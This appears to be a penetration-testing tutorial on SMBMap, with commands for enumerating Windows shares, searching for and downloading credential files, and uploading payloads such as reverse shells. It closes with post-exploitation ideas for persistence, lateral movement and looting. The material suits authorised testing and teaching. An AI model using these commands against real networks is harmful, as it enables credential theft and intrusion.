smbmap:
Overview
SMBMap is a powerful post-exploitation and enumeration tool used to gain insight into Windows file shares across a network. It allows pentesters to:
- Enumerate shares
- Access files/folders
- Download/upload files
- Search for specific file types
- Identify permissions (read/write/execute)
- Discover misconfigured shares
Unlike tools like smbclient or rpcclient, smbmap is more intuitive and fast for automated enumeration during internal network engagements. It’s especially useful when looking for open shares that might contain sensitive files or when planning lateral movement.
Installation
On Kali Linux, it’s preinstalled. If not:
sudo apt install smbmap
Or from GitHub:
git clone https://github.com/ShawnDEvans/smbmap.git
cd smbmap
pip install -r requirements.txt
1. Scanning and Basic Enumeration
Anonymous Enumeration
smbmap -H 10.10.10.5
# Check for accessible shares anonymously
If guest access is allowed, this will list readable or writable shares without credentials.
Enumerate Shares with Credentials
smbmap -H 10.10.10.5 -u user -p password
# Authenticated scan to list available shares and access rights
You can also specify a domain:
smbmap -H 10.10.10.5 -u user -p password -d CORP
2. Deeper Enumeration
Check Specific Share Access
smbmap -H 10.10.10.5 -u user -p password -d CORP -s "Users"
# See access rights for a specific share
Recursively List All Files In Share
smbmap -H 10.10.10.5 -u user -p password -r (share_NAME)
# Recursively list directories and files
Useful for finding documents, passwords, or scripts.
**Search for Specific Files (e.g., *.xls, .txt, .kdbx)
smbmap -H 10.10.10.5 -u user -p password -R -A ".kdbx"
# -A = search for a file pattern
This is an underrated trick to spot KeePass databases, passwords.txt, or even credential spreadsheets.
3. Exploitation Techniques
Download Files
smbmap -H 10.10.10.5 -u user -p password -R -A "password" --download
# Downloads files matching the keyword
Upload Files (if write permission is present)
smbmap -H 10.10.10.5 -u user -p password -r "Temp" --upload ./payload.exe
# Uploads a file to a writable share
This is useful for dropping payloads, reverse shells, or HTA files for execution via user interaction.
Check Write Permissions Across Shares
smbmap -H 10.10.10.5 -u user -p password -P
# -P = Only print shares with write access
Any writable share could be leveraged for lateral movement, persistence, or privilege escalation (e.g., via startup folder abuse or DLL hijacking).
4. Post-Exploitation Ideas
Once you’ve identified shares or dropped payloads:
- Create Persistence: Upload a malicious script to a startup folder if you have write access.
- Credential Theft: Look for
.kdbx,.config,.rdp,.xml, and.batfiles. - Lateral Movement: Upload tools/scripts to writable shares for execution from another host.
- Looting: Dump files like finance spreadsheets, backups, saved browser passwords, or AD enumeration scripts.
Common Real-World Use Cases
| Goal | Example |
|---|---|
| Find sensitive files | smbmap -R -A password |
| Check writable shares | smbmap -P |
| Upload payload | --upload reverse.exe |
| Enumerate without creds | smbmap -H <ip> |
Final Thoughts
smbmap is often underrated, but it shines in post-exploitation and internal enumeration phases. It’s a go-to tool when credentials are available or guest access is enabled. Pair it with other tools like crackmapexec or rpcclient for maximum SMB dominance.
